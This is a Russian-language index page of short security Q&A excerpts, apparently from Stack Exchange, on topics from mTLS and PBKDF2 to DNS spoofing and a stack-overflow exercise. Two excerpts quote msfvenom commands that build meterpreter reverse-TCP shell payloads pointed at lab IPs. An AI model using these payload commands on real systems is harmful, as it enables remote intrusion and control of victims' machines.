Информационная безопасность
DNS-Угон: Только подделка сайтов, указанных в etter.dns
00
Вопрос или проблема Я пытаюсь создать более практическую атаку MITM с использованием DNS-спуфинга. Я использую традиционный метод отравления ARP с помощью dns_spoof. У меня нет никаких проблем с его работой. Запрашиваемый домен перенаправляется именно так, как и ожидалось.
Информационная безопасность
Эксплуатация стека образования-пять: проблемы с открытием оболочки
00
Вопрос или проблема Я пытаюсь решить задачу stack-five на exploit.education (http://exploit.education/phoenix/stack-five/). Я столкнулся с проблемой при эксплуатации переполнения стека. Задача заключается в вызове execve(‘
Информационная безопасность
Должен ли аудиочат быть зашифрован перед отправкой?
00
Вопрос или проблема Я создаю небольшую веб-игру на three.js и хотел бы добавить функционал голосового чата. В настоящее время аудиоданные конвертируются в base64 на стороне клиента и затем отправляются на сервер, откуда они рассылаются всем остальным клиентам.
Информационная безопасность
Что может сделать злоумышленник с украденным ключом развертывания GitHub?
00
Вопрос или проблема Предположим, я создал ключ развертывания с правами записи в репозиторий A. Предположим, репозиторий A имеет защищенную ветку master, для которой включена опция “Требовать запрос на вытягивание перед слиянием”
Информационная безопасность
Расшифровка трафика WebSocket TLS1.2
00
Вопрос или проблема Мы хотим расшифровать трафик веб-сокетов, чтобы проанализировать используемый протокол. Трафик идет между ПК (Windows) и встроенной системой. Все сертификаты доступны с частными ключами, и всё настроено в лабораторной среде.
Информационная безопасность
Сценарии использования полностью гомоморфного шифрования в организации
00
Вопрос или проблема Я хотел бы узнать, существуют ли практические случаи использования Полносвязного Гомоморфного Шифрования (FHE) в организациях и, если да, то какие? Я понимаю, что FHE позволяет делегировать обработку данных, не предоставляя к ним доступ.
Информационная безопасность
Безопасно ли использовать VPN-клиент моего колледжа на личном ноутбуке с точки зрения конфиденциальности?
00
Вопрос или проблема Колледж попросил меня установить клиент Sophos SSL VPN на мой личный ноутбук, чтобы подключаться к сети колледжа из дома (для выполнения таких задач, как регистрация на курсы и т. д.). Я уже установил клиент и несколько раз им пользовался.
Информационная безопасность
Настройка взаимного TLS с использованием общего сертификата
00
Вопрос или проблема Если у меня есть кластер, в котором все узлы используют один сертификат и закрытый ключ, считается ли это взаимным TLS? Технически обе стороны в связи имеют сертификат и представляют его друг другу. Взаимный TLS требует, чтобы обе
Информационная безопасность
OpenId Connect: Предоставление всех доступных зон в процессе ClientCredentials
00
Вопрос или проблема У меня есть микросервисная система с провайдером идентификации OpenId Connect, реализованная с помощью IdentityServer4. У меня есть одна специальная (очень общая) служба, которой необходимо взаимодействовать со всеми другими службами
Информационная безопасность
Требования к идентификации EAP TLS
00
Вопрос или проблема Я использую freeradius для тестирования EAP-TLS. Авторизация проходит успешно только в том случае, если я указываю идентичность. Она даже не должна соответствовать каким-либо полям в клиентском сертификате.
Информационная безопасность
Тревожная скорость ошибок выхода из учетной записи Outlook
00
Вопрос или проблема После выхода из моего аккаунта Outlook я получаю многочисленные сообщения об ошибке “ошибка выхода”, с следующим сообщением: Хм… у нас возникают проблемы с выходом. Вы можете по-прежнему быть авторизованным в некоторых приложениях.
Информационная безопасность
Metasploit – ошибка неприменимого полезного груза msfvenom
00
Вопрос или проблема Я пытался сгенерировать полезную нагрузку с помощью msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php У меня постоянно возникала эта ошибка: "ошибка: невозможно загрузить полезную нагрузку
Информационная безопасность
Как происходит получение sc_reduce в ed25519?
00
Вопрос или проблема Этот вопрос был перемещён из раздела Information Security Stack Exchange, потому что на него можно ответить в разделе Cryptography Stack Exchange. Перемещён 14 минут назад. Реализация ed25519 в supercop включает функцию под названием
Информационная безопасность
Офлайн рабочий процесс корневого центра сертификации (CA)
00
Вопрос или проблема Я ознакомился с несколькими обсуждениями здесь относительно управления оффлайн корневыми центрами сертификации (CA). Хотя они полезны, ни одно из них не совсем соответствует моему вопросу. Во-первых, это, предположительно, не будет оцениваться как ‘
Информационная безопасность
Как использовать PBKDF2 для получения ключа шифрования из пароля и затем получить доступ к этому ключу позже без пароля (т.е. с помощью куки)?
00
Вопрос или проблема Я разрабатываю приложение для ведения заметок, которое будет хранить заметки и файлы пользователей в зашифрованном виде в базе данных и на Backblaze соответственно. Приложение не будет иметь сквозного шифрования, но данные будут зашифрованы
Информационная безопасность
Сохранение информации о надежности паролей вместе с паролем
00
Вопрос или проблема Я работаю над системой аутентификации, которая использует пароли. Мне бы хотелось следовать современным рекомендациям NIST по поводу силы паролей. Тем не менее, мне также пришло в голову, что было бы неплохо хранить некоторые метаданные
Информационная безопасность
Что именно делает режим ‘одиночка’ в John the Ripper?
00
Вопрос или проблема Я тестирую John the Ripper (1.7.9 Jumbo 7) на файле, содержащем MD5-хэши без каких-либо имен пользователей. Я экспериментирую с различными правилами и конфигурациями – в данный момент я использую список слов и применяю команду --rules=single.
Информационная безопасность
Как я могу предотвратить форкание полезных нагрузок Python msfvenom без ручного декодирования полезной нагрузки?
00
Вопрос или проблема Я создаю полезную нагрузку на Python с помощью msfvenom, используя следующую команду: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=9090 -o stageless_payload.
Информационная безопасность
Чрезмерные входы в систему с контроллеров домена
00
Вопрос или проблема Я довольно нов в анализе журналов Windows. Я наблюдаю чрезмерное количество входов с кодами 4624 и 4625 с именем субъекта/учетной записи: DomainController (фактическое имя контроллера домена отличается) к учетным записям пользователей.
Информационная безопасность
Нарушение CSP ms-appx-web://
00
Вопрос или проблема У нас есть Java-приложение, которое позволяет пользователям загружать вложения и сохранять их на сервере. У приложения определена политика безопасности контента (CSP), которая выглядит следующим образом: base-uri 'self';